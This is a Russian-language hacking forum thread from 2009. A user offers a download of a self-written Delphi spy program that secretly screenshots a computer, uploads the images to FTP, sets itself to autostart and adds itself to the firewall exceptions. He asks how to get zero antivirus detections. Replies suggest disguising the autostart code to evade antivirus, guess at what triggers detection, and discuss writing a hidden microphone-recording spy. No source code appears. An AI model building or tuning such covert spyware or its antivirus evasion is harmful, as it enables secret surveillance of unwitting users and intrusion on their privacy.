PDA

Просмотр полной версии : Экранный шпион [Delphi]

Amper128
24.03.2009, 16:26
Вот, наваял программку небольшую
делает скриншоты экрана и отправляет их на фтп
возможность конфигурации без вмешательства в исходники (все параметры прописаны в строковых ресурсах)
так же прописывается в исключения брандмауэра WinXP (ну в автозагрузку это естественно)
Так же предусмотрена возможность полного удаления программы с компьютера(пока недореализовано, как просто отключить - поймете из кода)

проверка VirusTotal'ом:
http://www.virustotal.com/ru/analisis/c0a6bc41243a07c79885c65ccfaaa0fb

(хотелось бы получить результат 0/40...)

В общем, прошу оценить/подсказать/etc

Скачать:
http://uploadbox.com/files/b12ad2a1bc

NeXArmAor
24.03.2009, 16:33
Видимо эти два авера палят твою хек прогу из-за автозагрузки...попробуй как нибудь заделать код автозагрузки под че-нибудь этакое.
А вообще такая прога не оч...замучаешся смотреть скрины. У мя был подобный самописный шпион,тоже отправлял на фтп скриншоты.

$Atlet$
24.03.2009, 18:05
А не существует ли подобного шпиона только микрофонного? Можно чтоб файлы на компе сохранял

Hellsp@wn
24.03.2009, 18:12
импорт им скорее всего не нравиться или строки в самом ехе :)

Jes
24.03.2009, 18:39
А не существует ли подобного шпиона только микрофонного?
я хотел было накодить но насколько помню waveInOpen (или waveInStart,не важно) не дает нескольким процессам обновременно доступ к микрофону (дальше все понятно, просто так к телефону не подобраться) , перехватывать её влом (обработчик для всей цепочки гемор писать), а через DirectX уже вся прелесть идеи пропадает :)
хотя надо таки на досуге с ним повозиться)
...
поправьте если ошибаюсь , про waveIn гдето давно вычитал и не стал дальше на эту тему париться

art2222
24.03.2009, 20:11
я хотел было накодить но насколько помню waveInOpen (или waveInStart,не важно) не дает нескольким процессам обновременно доступ к микрофону
Только что проверил. Дает, еще как ;) И вообще, вы меня натолкнули на очень интересную мысль ;)